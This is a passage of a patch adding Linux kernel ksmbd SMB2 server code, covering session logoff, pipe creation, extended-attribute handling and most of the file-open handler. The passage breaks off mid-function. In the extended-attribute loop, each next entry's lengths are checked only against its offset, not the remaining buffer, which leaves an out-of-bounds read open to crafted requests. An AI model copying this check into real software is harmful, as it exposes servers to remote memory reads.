++		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
++
++		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
++		smb2_set_err_rsp(work);
++		return 0;
++	}
++
++	ksmbd_close_tree_conn_fds(work);
++	ksmbd_tree_conn_disconnect(sess, tcon);
++	work->tcon = NULL;
++	return 0;
++}
++
++/**
++ * smb2_session_logoff() - handler for session log off request
++ * @work:	smb work containing request buffer
++ *
++ * Return:      0
++ */
++int smb2_session_logoff(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_logoff_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_session *sess;
++	struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
++	u64 sess_id = le64_to_cpu(req->hdr.SessionId);
++
++	rsp->StructureSize = cpu_to_le16(4);
++	inc_rfc1001_len(work->response_buf, 4);
++
++	ksmbd_debug(SMB, "request\n");
++
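++	/*
++	 * Flag every connection bound to this session for reconnect and
++	 * wait until its in-flight requests have drained before tearing
++	 * the session state down.
++	 */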
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_RECONNECT);
++	ksmbd_close_session_fds(work);
++	ksmbd_conn_wait_idle(conn, sess_id);
++
++	/*
++	 * Re-lookup session to validate if session is deleted
++	 * while waiting request complete
++	 */
++	sess = ksmbd_session_lookup_all(conn, sess_id);
++	if (ksmbd_tree_conn_session_logoff(sess)) {
++		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
++		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
++		smb2_set_err_rsp(work);
++		return 0;
++	}
++
++	ksmbd_destroy_file_table(&sess->file_table);
++	sess->state = SMB2_SESSION_EXPIRED;
++
++	ksmbd_free_user(sess->user);
++	sess->user = NULL;
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_NEGOTIATE);
++	return 0;
++}
++
++/**
++ * create_smb2_pipe() - create IPC pipe
++ * @work:	smb work containing request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++static noinline int create_smb2_pipe(struct ksmbd_work *work)
++{
++	struct smb2_create_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_create_req *req = smb2_get_msg(work->request_buf);
++	int id;
++	int err;
++	char *name;
++
++	name = smb_strndup_from_utf16(req->Buffer, le16_to_cpu(req->NameLength),
++				      1, work->conn->local_nls);
++	if (IS_ERR(name)) {
++		rsp->hdr.Status = STATUS_NO_MEMORY;
++		err = PTR_ERR(name);
++		goto out;
++	}
++
++	id = ksmbd_session_rpc_open(work->sess, name);
++	if (id < 0) {
++		pr_err("Unable to open RPC pipe: %d\n", id);
++		err = id;
++		goto out;
++	}
++
++	rsp->hdr.Status = STATUS_SUCCESS;
++	rsp->StructureSize = cpu_to_le16(89);
++	rsp->OplockLevel = SMB2_OPLOCK_LEVEL_NONE;
++	rsp->Flags = 0;
++	rsp->CreateAction = cpu_to_le32(FILE_OPENED);
++
++	rsp->CreationTime = cpu_to_le64(0);
++	rsp->LastAccessTime = cpu_to_le64(0);
++	rsp->ChangeTime = cpu_to_le64(0);
++	rsp->AllocationSize = cpu_to_le64(0);
++	rsp->EndofFile = cpu_to_le64(0);
++	rsp->FileAttributes = FILE_ATTRIBUTE_NORMAL_LE;
++	rsp->Reserved2 = 0;
++	rsp->VolatileFileId = id;
++	rsp->PersistentFileId = 0;
++	rsp->CreateContextsOffset = 0;
++	rsp->CreateContextsLength = 0;
++
++	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1 */
++	kfree(name);
++	return 0;
++
++out:
++	switch (err) {
++	case -EINVAL:
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		break;
++	case -ENOSPC:
++	case -ENOMEM:
++		rsp->hdr.Status = STATUS_NO_MEMORY;
++		break;
++	}
++
++	if (!IS_ERR(name))
++		kfree(name);
++
++	smb2_set_err_rsp(work);
++	return err;
++}
++
++/**
++ * smb2_set_ea() - handler for setting extended attributes using set
++ *		info command
++ * @eabuf:	set info command buffer
++ * @buf_len:	set info command buffer length
++ * @path:	path of the dentry the EAs are applied to
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int smb2_set_ea(struct smb2_ea_info *eabuf, unsigned int buf_len,
++		       const struct path *path)
++{
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	char *attr_name = NULL, *value;
++	int rc = 0;
++	unsigned int next = 0;
++
++	if (buf_len < sizeof(struct smb2_ea_info) + eabuf->EaNameLength +
++			le16_to_cpu(eabuf->EaValueLength))
++		return -EINVAL;
++
++	attr_name = kmalloc(XATTR_NAME_MAX + 1, GFP_KERNEL);
++	if (!attr_name)
++		return -ENOMEM;
++
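++	/* Walk the chain of smb2_ea_info entries linked by NextEntryOffset. */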
++	do {
++		if (!eabuf->EaNameLength)
++			goto next;
++
++		ksmbd_debug(SMB,
++			    "name : <%s>, name_len : %u, value_len : %u, next : %u\n",
++			    eabuf->name, eabuf->EaNameLength,
++			    le16_to_cpu(eabuf->EaValueLength),
++			    le32_to_cpu(eabuf->NextEntryOffset));
++
++		if (eabuf->EaNameLength >
++		    (XATTR_NAME_MAX - XATTR_USER_PREFIX_LEN)) {
++			rc = -EINVAL;
++			break;
++		}
++
++		memcpy(attr_name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN);
++		memcpy(&attr_name[XATTR_USER_PREFIX_LEN], eabuf->name,
++		       eabuf->EaNameLength);
++		attr_name[XATTR_USER_PREFIX_LEN + eabuf->EaNameLength] = '\0';
++		value = (char *)&eabuf->name + eabuf->EaNameLength + 1;
++
++		if (!eabuf->EaValueLength) {
++			rc = ksmbd_vfs_casexattr_len(user_ns,
++						     path->dentry,
++						     attr_name,
++						     XATTR_USER_PREFIX_LEN +
++						     eabuf->EaNameLength);
++
++			/* delete the EA only when it exists */
++			if (rc > 0) {
++				rc = ksmbd_vfs_remove_xattr(user_ns,
++							    path->dentry,
++							    attr_name);
++
++				if (rc < 0) {
++					ksmbd_debug(SMB,
++						    "remove xattr failed(%d)\n",
++						    rc);
++					break;
++				}
++			}
++
++			/* if the EA doesn't exist, just do nothing. */
++			rc = 0;
++		} else {
++			rc = ksmbd_vfs_setxattr(user_ns,
++						path->dentry, attr_name, value,
++						le16_to_cpu(eabuf->EaValueLength), 0);
++			if (rc < 0) {
++				ksmbd_debug(SMB,
++					    "ksmbd_vfs_setxattr failed(%d)\n",
++					    rc);
++				break;
++			}
++		}
++
++next:
++		next = le32_to_cpu(eabuf->NextEntryOffset);
++		if (next == 0 || buf_len < next)
++			break;
++		buf_len -= next;
++		eabuf = (struct smb2_ea_info *)((char *)eabuf + next);
++		if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength))
++			break;
++
++	} while (next != 0);
++
++	kfree(attr_name);
++	return rc;
++}
++
++static noinline int smb2_set_stream_name_xattr(const struct path *path,
++					       struct ksmbd_file *fp,
++					       char *stream_name, int s_type)
++{
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	size_t xattr_stream_size;
++	char *xattr_stream_name;
++	int rc;
++
++	rc = ksmbd_vfs_xattr_stream_name(stream_name,
++					 &xattr_stream_name,
++					 &xattr_stream_size,
++					 s_type);
++	if (rc)
++		return rc;
++
++	fp->stream.name = xattr_stream_name;
++	fp->stream.size = xattr_stream_size;
++
++	/* Check if there is stream prefix in xattr space */
++	rc = ksmbd_vfs_casexattr_len(user_ns,
++				     path->dentry,
++				     xattr_stream_name,
++				     xattr_stream_size);
++	if (rc >= 0)
++		return 0;
++
++	if (fp->cdoption == FILE_OPEN_LE) {
++		ksmbd_debug(SMB, "XATTR stream name lookup failed: %d\n", rc);
++		return -EBADF;
++	}
++
++	rc = ksmbd_vfs_setxattr(user_ns, path->dentry,
++				xattr_stream_name, NULL, 0, 0);
++	if (rc < 0)
++		pr_err("Failed to store XATTR stream name: %d\n", rc);
++	return 0;
++}
++
++static int smb2_remove_smb_xattrs(const struct path *path)
++{
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	char *name, *xattr_list = NULL;
++	ssize_t xattr_list_len;
++	int err = 0;
++
++	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
++	if (xattr_list_len < 0) {
++		goto out;
++	} else if (!xattr_list_len) {
++		ksmbd_debug(SMB, "empty xattr in the file\n");
++		goto out;
++	}
++
++	for (name = xattr_list; name - xattr_list < xattr_list_len;
++			name += strlen(name) + 1) {
++		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
++
++		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN) &&
++		    !strncmp(&name[XATTR_USER_PREFIX_LEN], STREAM_PREFIX,
++			     STREAM_PREFIX_LEN)) {
++			err = ksmbd_vfs_remove_xattr(user_ns, path->dentry,
++						     name);
++			if (err)
++				ksmbd_debug(SMB, "remove xattr failed : %s\n",
++					    name);
++		}
++	}
++out:
++	kvfree(xattr_list);
++	return err;
++}
++
++static int smb2_create_truncate(const struct path *path)
++{
++	int rc = vfs_truncate(path, 0);
++
++	if (rc) {
++		pr_err("vfs_truncate failed, rc %d\n", rc);
++		return rc;
++	}
++
++	rc = smb2_remove_smb_xattrs(path);
++	if (rc == -EOPNOTSUPP)
++		rc = 0;
++	if (rc)
++		ksmbd_debug(SMB,
++			    "smb2_remove_smb_xattrs failed, rc %d\n",
++			    rc);
++	return rc;
++}
++
++static void smb2_new_xattrs(struct ksmbd_tree_connect *tcon, const struct path *path,
++			    struct ksmbd_file *fp)
++{
++	struct xattr_dos_attrib da = {0};
++	int rc;
++
++	if (!test_share_config_flag(tcon->share_conf,
++				    KSMBD_SHARE_FLAG_STORE_DOS_ATTRS))
++		return;
++
++	da.version = 4;
++	da.attr = le32_to_cpu(fp->f_ci->m_fattr);
++	da.itime = da.create_time = fp->create_time;
++	da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
++		XATTR_DOSINFO_ITIME;
++
++	rc = ksmbd_vfs_set_dos_attrib_xattr(mnt_user_ns(path->mnt),
++					    path->dentry, &da);
++	if (rc)
++		ksmbd_debug(SMB, "failed to store file attribute into xattr\n");
++}
++
++static void smb2_update_xattrs(struct ksmbd_tree_connect *tcon,
++			       const struct path *path, struct ksmbd_file *fp)
++{
++	struct xattr_dos_attrib da;
++	int rc;
++
++	fp->f_ci->m_fattr &= ~(FILE_ATTRIBUTE_HIDDEN_LE | FILE_ATTRIBUTE_SYSTEM_LE);
++
++	/* get FileAttributes from XATTR_NAME_DOS_ATTRIBUTE */
++	if (!test_share_config_flag(tcon->share_conf,
++				    KSMBD_SHARE_FLAG_STORE_DOS_ATTRS))
++		return;
++
++	rc = ksmbd_vfs_get_dos_attrib_xattr(mnt_user_ns(path->mnt),
++					    path->dentry, &da);
++	if (rc > 0) {
++		fp->f_ci->m_fattr = cpu_to_le32(da.attr);
++		fp->create_time = da.create_time;
++		fp->itime = da.itime;
++	}
++}
++
++static int smb2_creat(struct ksmbd_work *work, struct path *path, char *name,
++		      int open_flags, umode_t posix_mode, bool is_dir)
++{
++	struct ksmbd_tree_connect *tcon = work->tcon;
++	struct ksmbd_share_config *share = tcon->share_conf;
++	umode_t mode;
++	int rc;
++
++	if (!(open_flags & O_CREAT))
++		return -EBADF;
++
++	ksmbd_debug(SMB, "file does not exist, so creating\n");
++	if (is_dir) {
++		ksmbd_debug(SMB, "creating directory\n");
++
++		mode = share_config_directory_mode(share, posix_mode);
++		rc = ksmbd_vfs_mkdir(work, name, mode);
++		if (rc)
++			return rc;
++	} else {
++		ksmbd_debug(SMB, "creating regular file\n");
++
++		mode = share_config_create_mode(share, posix_mode);
++		rc = ksmbd_vfs_create(work, name, mode);
++		if (rc)
++			return rc;
++	}
++
++	rc = ksmbd_vfs_kern_path(work, name, 0, path, 0);
++	if (rc) {
++		pr_err("cannot get linux path (%s), err = %d\n",
++		       name, rc);
++		return rc;
++	}
++	return 0;
++}
++
++static int smb2_create_sd_buffer(struct ksmbd_work *work,
++				 struct smb2_create_req *req,
++				 const struct path *path)
++{
++	struct create_context *context;
++	struct create_sd_buf_req *sd_buf;
++
++	if (!req->CreateContextsOffset)
++		return -ENOENT;
++
++	/* Parse SD BUFFER create contexts */
++	context = smb2_find_context_vals(req, SMB2_CREATE_SD_BUFFER, 4);
++	if (!context)
++		return -ENOENT;
++	else if (IS_ERR(context))
++		return PTR_ERR(context);
++
++	ksmbd_debug(SMB,
++		    "Set ACLs using SMB2_CREATE_SD_BUFFER context\n");
++	sd_buf = (struct create_sd_buf_req *)context;
++	if (le16_to_cpu(context->DataOffset) +
++	    le32_to_cpu(context->DataLength) <
++	    sizeof(struct create_sd_buf_req))
++		return -EINVAL;
++	return set_info_sec(work->conn, work->tcon, path, &sd_buf->ntsd,
++			    le32_to_cpu(sd_buf->ccontext.DataLength), true);
++}
++
++static void ksmbd_acls_fattr(struct smb_fattr *fattr,
++			     struct user_namespace *mnt_userns,
++			     struct inode *inode)
++{
++	vfsuid_t vfsuid = i_uid_into_vfsuid(mnt_userns, inode);
++	vfsgid_t vfsgid = i_gid_into_vfsgid(mnt_userns, inode);
++
++	fattr->cf_uid = vfsuid_into_kuid(vfsuid);
++	fattr->cf_gid = vfsgid_into_kgid(vfsgid);
++	fattr->cf_mode = inode->i_mode;
++	fattr->cf_acls = NULL;
++	fattr->cf_dacls = NULL;
++
++	if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
++		fattr->cf_acls = get_acl(inode, ACL_TYPE_ACCESS);
++		if (S_ISDIR(inode->i_mode))
++			fattr->cf_dacls = get_acl(inode, ACL_TYPE_DEFAULT);
++	}
++}
++
++/**
++ * smb2_open() - handler for smb file open request
++ * @work:	smb work containing request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++int smb2_open(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_tree_connect *tcon = work->tcon;
++	struct smb2_create_req *req;
++	struct smb2_create_rsp *rsp;
++	struct path path;
++	struct ksmbd_share_config *share = tcon->share_conf;
++	struct ksmbd_file *fp = NULL;
++	struct file *filp = NULL;
++	struct user_namespace *user_ns = NULL;
++	struct kstat stat;
++	struct create_context *context;
++	struct lease_ctx_info *lc = NULL;
++	struct create_ea_buf_req *ea_buf = NULL;
++	struct oplock_info *opinfo;
++	__le32 *next_ptr = NULL;
++	int req_op_level = 0, open_flags = 0, may_flags = 0, file_info = 0;
++	int rc = 0;
++	int contxt_cnt = 0, query_disk_id = 0;
++	int maximal_access_ctxt = 0, posix_ctxt = 0;
++	int s_type = 0;
++	int next_off = 0;
++	char *name = NULL;
++	char *stream_name = NULL;
++	bool file_present = false, created = false, already_permitted = false;
++	int share_ret, need_truncate = 0;
++	u64 time;
++	umode_t posix_mode = 0;
++	__le32 daccess, maximal_access = 0;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (req->hdr.NextCommand && !work->next_smb2_rcv_hdr_off &&
++	    (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)) {
++		ksmbd_debug(SMB, "invalid flag in chained command\n");
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		smb2_set_err_rsp(work);
++		return -EINVAL;
++	}
++
++	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
++		ksmbd_debug(SMB, "IPC pipe create request\n");
++		return create_smb2_pipe(work);
++	}
++
++	if (req->NameLength) {
++		if ((req->CreateOptions & FILE_DIRECTORY_FILE_LE) &&
++		    *(char *)req->Buffer == '\\') {
++			pr_err("directory name with a leading slash is not allowed\n");
++			rc = -EINVAL;
++			goto err_out1;
++		}
++
++		name = smb2_get_name(req->Buffer,
++				     le16_to_cpu(req->NameLength),
++				     work->conn->local_nls);
++		if (IS_ERR(name)) {
++			rc = PTR_ERR(name);
++			if (rc != -ENOMEM)
++				rc = -ENOENT;
++			name = NULL;
++			goto err_out1;
++		}
++
++		ksmbd_debug(SMB, "converted name = %s\n", name);
++		if (strchr(name, ':')) {
++			if (!test_share_config_flag(work->tcon->share_conf,
++						    KSMBD_SHARE_FLAG_STREAMS)) {
++				rc = -EBADF;
++				goto err_out1;
++			}
++			rc = parse_stream_name(name, &stream_name, &s_type);
++			if (rc < 0)
++				goto err_out1;
++		}
++
++		rc = ksmbd_validate_filename(name);
++		if (rc < 0)
++			goto err_out1;
++
++		if (ksmbd_share_veto_filename(share, name)) {
++			rc = -ENOENT;
++			ksmbd_debug(SMB, "Reject open(), vetoed file: %s\n",
++				    name);
++			goto err_out1;
++		}
++	} else {
++		name = kstrdup("", GFP_KERNEL);
++		if (!name) {
++			rc = -ENOMEM;
++			goto err_out1;
++		}
++	}
++
++	req_op_level = req->RequestedOplockLevel;
++	if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE)
++		lc = parse_lease_state(req);
++
++	if (le32_to_cpu(req->ImpersonationLevel) > le32_to_cpu(IL_DELEGATE)) {
++		pr_err("Invalid impersonation level : 0x%x\n",
++		       le32_to_cpu(req->ImpersonationLevel));
++		rc = -EIO;
++		rsp->hdr.Status = STATUS_BAD_IMPERSONATION_LEVEL;
++		goto err_out1;
++	}
++
++	if (req->CreateOptions && !(req->CreateOptions & CREATE_OPTIONS_MASK_LE)) {
++		pr_err("Invalid create options : 0x%x\n",
++		       le32_to_cpu(req->CreateOptions));
++		rc = -EINVAL;
++		goto err_out1;
++	} else {
++		if (req->CreateOptions & FILE_SEQUENTIAL_ONLY_LE &&
++		    req->CreateOptions & FILE_RANDOM_ACCESS_LE)
++			req->CreateOptions = ~(FILE_SEQUENTIAL_ONLY_LE);
++
++		if (req->CreateOptions &
++		    (FILE_OPEN_BY_FILE_ID_LE | CREATE_TREE_CONNECTION |
++		     FILE_RESERVE_OPFILTER_LE)) {
++			rc = -EOPNOTSUPP;
++			goto err_out1;
++		}
++
++		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
++			if (req->CreateOptions & FILE_NON_DIRECTORY_FILE_LE) {
++				rc = -EINVAL;
++				goto err_out1;
++			} else if (req->CreateOptions & FILE_NO_COMPRESSION_LE) {
++				req->CreateOptions = ~(FILE_NO_COMPRESSION_LE);
++			}
++		}
++	}
++
++	if (le32_to_cpu(req->CreateDisposition) >
++	    le32_to_cpu(FILE_OVERWRITE_IF_LE)) {
++		pr_err("Invalid create disposition : 0x%x\n",
++		       le32_to_cpu(req->CreateDisposition));
++		rc = -EINVAL;
++		goto err_out1;
++	}
++
++	if (!(req->DesiredAccess & DESIRED_ACCESS_MASK)) {
++		pr_err("Invalid desired access : 0x%x\n",
++		       le32_to_cpu(req->DesiredAccess));
++		rc = -EACCES;
++		goto err_out1;
++	}
++
++	if (req->FileAttributes && !(req->FileAttributes & FILE_ATTRIBUTE_MASK_LE)) {
++		pr_err("Invalid file attribute : 0x%x\n",
++		       le32_to_cpu(req->FileAttributes));
++		rc = -EINVAL;
++		goto err_out1;
++	}
++
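++	/*
++	 * Parse the optional create contexts attached to the request:
++	 * EA buffer, query-maximal-access, timewarp and POSIX contexts.
++	 */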
++	if (req->CreateContextsOffset) {
++		/* Parse non-durable handle create contexts */
++		context = smb2_find_context_vals(req, SMB2_CREATE_EA_BUFFER, 4);
++		if (IS_ERR(context)) {
++			rc = PTR_ERR(context);
++			goto err_out1;
++		} else if (context) {
++			ea_buf = (struct create_ea_buf_req *)context;
++			if (le16_to_cpu(context->DataOffset) +
++			    le32_to_cpu(context->DataLength) <
++			    sizeof(struct create_ea_buf_req)) {
++				rc = -EINVAL;
++				goto err_out1;
++			}
++			if (req->CreateOptions & FILE_NO_EA_KNOWLEDGE_LE) {
++				rsp->hdr.Status = STATUS_ACCESS_DENIED;
++				rc = -EACCES;
++				goto err_out1;
++			}
++		}
++
++		context = smb2_find_context_vals(req,
++						 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST, 4);
++		if (IS_ERR(context)) {
++			rc = PTR_ERR(context);
++			goto err_out1;
++		} else if (context) {
++			ksmbd_debug(SMB,
++				    "get query maximal access context\n");
++			maximal_access_ctxt = 1;
++		}
++
++		context = smb2_find_context_vals(req,
++						 SMB2_CREATE_TIMEWARP_REQUEST, 4);
++		if (IS_ERR(context)) {
++			rc = PTR_ERR(context);
++			goto err_out1;
++		} else if (context) {
++			ksmbd_debug(SMB, "get timewarp context\n");
++			rc = -EBADF;
++			goto err_out1;
++		}
++
++		if (tcon->posix_extensions) {
++			context = smb2_find_context_vals(req,
++							 SMB2_CREATE_TAG_POSIX, 16);
++			if (IS_ERR(context)) {
++				rc = PTR_ERR(context);
++				goto err_out1;
++			} else if (context) {
++				struct create_posix *posix =
++					(struct create_posix *)context;
++				if (le16_to_cpu(context->DataOffset) +
++				    le32_to_cpu(context->DataLength) <
++				    sizeof(struct create_posix) - 4) {
++					rc = -EINVAL;
++					goto err_out1;
++				}
++				ksmbd_debug(SMB, "get posix context\n");
++
++				posix_mode = le32_to_cpu(posix->Mode);
++				posix_ctxt = 1;
++			}
++		}
++	}
++
++	if (ksmbd_override_fsids(work)) {
++		rc = -ENOMEM;
++		goto err_out1;
++	}
++
++	rc = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, 1);
++	if (!rc) {
++		if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE) {
++			/*
++			 * If the file already exists and delete-on-close is
++			 * combined with these dispositions, return an
++			 * access-denied error.
++			 */
++			if (req->CreateDisposition == FILE_OVERWRITE_IF_LE ||
++			    req->CreateDisposition == FILE_OPEN_IF_LE) {
++				rc = -EACCES;
++				path_put(&path);
++				goto err_out;
++			}
++
++			if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++				ksmbd_debug(SMB,
++					    "User does not have write permission\n");
++				rc = -EACCES;
++				path_put(&path);
++				goto err_out;
++			}
++		} else if (d_is_symlink(path.dentry)) {
++			rc = -EACCES;
++			path_put(&path);
++			goto err_out;
++		}
++	}
++
++	if (rc) {
++		if (rc != -ENOENT)
++			goto err_out;
++		ksmbd_debug(SMB, "can not get linux path for %s, rc = %d\n",
++			    name, rc);
++		rc = 0;
++	} else {
++		file_present = true;
++		user_ns = mnt_user_ns(path.mnt);
++	}
++	if (stream_name) {
++		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
++			if (s_type == DATA_STREAM) {
++				rc = -EIO;
++				rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
++			}
++		} else {
++			if (file_present && S_ISDIR(d_inode(path.dentry)->i_mode) &&
++			    s_type == DATA_STREAM) {
++				rc = -EIO;
++				rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
++			}
++		}
++
++		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE &&
++		    req->FileAttributes & FILE_ATTRIBUTE_NORMAL_LE) {
++			rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
++			rc = -EIO;
++		}
++
++		if (rc < 0)
++			goto err_out;
++	}
++
++	if (file_present && req->CreateOptions & FILE_NON_DIRECTORY_FILE_LE &&
++	    S_ISDIR(d_inode(path.dentry)->i_mode) &&
++	    !(req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
++		ksmbd_debug(SMB, "open() argument is a directory: %s, %x\n",
++			    name, req->CreateOptions);
++		rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
++		rc = -EIO;
++		goto err_out;
++	}
++
++	if (file_present && (req->CreateOptions & FILE_DIRECTORY_FILE_LE) &&
++	    !(req->CreateDisposition == FILE_CREATE_LE) &&
++	    !S_ISDIR(d_inode(path.dentry)->i_mode)) {
++		rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
++		rc = -EIO;
++		goto err_out;
++	}
++
++	if (!stream_name && file_present &&
++	    req->CreateDisposition == FILE_CREATE_LE) {
++		rc = -EEXIST;
++		goto err_out;
++	}
++
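++	/* Expand generic access bits in DesiredAccess into specific file access flags. */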
++	daccess = smb_map_generic_desired_access(req->DesiredAccess);
++
++	if (file_present && !(req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
++		rc = smb_check_perm_dacl(conn, &path, &daccess,
++					 sess->user->uid);
++		if (rc)
++			goto err_out;
++	}
++
++	if (daccess & FILE_MAXIMAL_ACCESS_LE) {
++		if (!file_present) {
++			daccess = cpu_to_le32(GENERIC_ALL_FLAGS);
++		} else {
++			rc = ksmbd_vfs_query_maximal_access(user_ns,
++							    path.dentry,
++							    &daccess);
++			if (rc)
++				goto err_out;
++			already_permitted = true;
++		}
++		maximal_access = daccess;
++	}
++
++	open_flags = smb2_create_open_flags(file_present, daccess,
++					    req->CreateDisposition,
++					    &may_flags);
++
++	if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++		if (open_flags & O_CREAT) {
++			ksmbd_debug(SMB,
++				    "User does not have write permission\n");
++			rc = -EACCES;
++			goto err_out;
++		}
++	}
++
++	/* create file if not present */
++	if (!file_present) {
++		rc = smb2_creat(work, &path, name, open_flags, posix_mode,
++				req->CreateOptions & FILE_DIRECTORY_FILE_LE);
++		if (rc) {
++			if (rc == -ENOENT) {
++				rc = -EIO;
++				rsp->hdr.Status = STATUS_OBJECT_PATH_NOT_FOUND;
++			}
++			goto err_out;
++		}
++
++		created = true;
++		user_ns = mnt_user_ns(path.mnt);
++		if (ea_buf) {
++			if (le32_to_cpu(ea_buf->ccontext.DataLength) <
++			    sizeof(struct smb2_ea_info)) {
++				rc = -EINVAL;
++				goto err_out;
++			}
++
++			rc = smb2_set_ea(&ea_buf->ea,
++					 le32_to_cpu(ea_buf->ccontext.DataLength),
++					 &path);
++			if (rc == -EOPNOTSUPP)
++				rc = 0;
++			else if (rc)
++				goto err_out;
++		}
++	} else if (!already_permitted) {
++		/* FILE_READ_ATTRIBUTE is allowed without inode_permission,
++		 * because execute (search) permission on the parent directory
++		 * is already granted.
++		 */
++		if (daccess & ~(FILE_READ_ATTRIBUTES_LE | FILE_READ_CONTROL_LE)) {
++			rc = inode_permission(user_ns,
++					      d_inode(path.dentry),
++					      may_flags);
++			if (rc)
++				goto err_out;
++
++			if ((daccess & FILE_DELETE_LE) ||
++			    (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
++				rc = ksmbd_vfs_may_delete(user_ns,
++							  path.dentry);
++				if (rc)
++					goto err_out;
++			}
++		}
++	}
++
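++	/* Refuse the open if the parent directory is pending deletion. */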
++	rc = ksmbd_query_inode_status(d_inode(path.dentry->d_parent));
++	if (rc == KSMBD_INODE_STATUS_PENDING_DELETE) {
++		rc = -EBUSY;
++		goto err_out;
++	}
++
++	rc = 0;
++	filp = dentry_open(&path, open_flags, current_cred());
++	if (IS_ERR(filp)) {
++		rc = PTR_ERR(filp);
++		pr_err("dentry open failed, rc %d\n", rc);
++		goto err_out;
++	}
++
++	if (file_present) {
++		if (!(open_flags & O_TRUNC))
++			file_info = FILE_OPENED;
++		else
++			file_info = FILE_OVERWRITTEN;
++
++		if ((req->CreateDisposition & FILE_CREATE_MASK_LE) ==
++		    FILE_SUPERSEDE_LE)
++			file_info = FILE_SUPERSEDED;
++	} else if (open_flags & O_CREAT) {
++		file_info = FILE_CREATED;
++	}
++
++	ksmbd_vfs_set_fadvise(filp, req->CreateOptions);
++
++	/* Obtain Volatile-ID */
++	fp = ksmbd_open_fd(work, filp);
++	if (IS_ERR(fp)) {
++		fput(filp);
++		rc = PTR_ERR(fp);
++		fp = NULL;
++		goto err_out;
++	}
++
++	/* Get Persistent-ID */
++	ksmbd_open_durable_fd(fp);
++	if (!has_file_id(fp->persistent_id)) {
++		rc = -ENOMEM;
++		goto err_out;
++	}
++
++	fp->cdoption = req->CreateDisposition;
++	fp->daccess = daccess;
++	fp->saccess = req->ShareAccess;
++	fp->coption = req->CreateOptions;
++
++	/* Set default windows and posix acls if creating new file */
++	if (created) {
++		int posix_acl_rc;
++		struct inode *inode = d_inode(path.dentry);
++
++		posix_acl_rc = ksmbd_vfs_inherit_posix_acl(user_ns,
++							   inode,
++							   d_inode(path.dentry->d_parent));
++		if (posix_acl_rc)
++			ksmbd_debug(SMB, "inherit posix acl failed : %d\n", posix_acl_rc);
++
++		if (test_share_config_flag(work->tcon->share_conf,
++					   KSMBD_SHARE_FLAG_ACL_XATTR)) {
++			rc = smb_inherit_dacl(conn, &path, sess->user->uid,
++					      sess->user->gid);
++		}
++
++		if (rc) {
++			rc = smb2_create_sd_buffer(work, req, &path);
++			if (rc) {
++				if (posix_acl_rc)
++					ksmbd_vfs_set_init_posix_acl(user_ns,
++								     inode);
++
++				if (test_share_config_flag(work->tcon->share_conf,
++							   KSMBD_SHARE_FLAG_ACL_XATTR)) {
++					struct smb_fattr fattr;
++					struct smb_ntsd *pntsd;
++					int pntsd_size, ace_num = 0;
++
++					ksmbd_acls_fattr(&fattr, user_ns, inode);
++					if (fattr.cf_acls)
++						ace_num = fattr.cf_acls->a_count;
++					if (fattr.cf_dacls)
++						ace_num += fattr.cf_dacls->a_count;
++
++					pntsd = kmalloc(sizeof(struct smb_ntsd) +
++							sizeof(struct smb_sid) * 3 +
++							sizeof(struct smb_acl) +
++							sizeof(struct smb_ace) * ace_num * 2,
++							GFP_KERNEL);
++					if (!pntsd) {
++						posix_acl_release(fattr.cf_acls);
++						posix_acl_release(fattr.cf_dacls);
++						goto err_out;
++					}
++
++					rc = build_sec_desc(user_ns,
++							    pntsd, NULL, 0,
++							    OWNER_SECINFO |
++							    GROUP_SECINFO |
++							    DACL_SECINFO,
++							    &pntsd_size, &fattr);
++					posix_acl_release(fattr.cf_acls);
++					posix_acl_release(fattr.cf_dacls);
++					if (rc) {
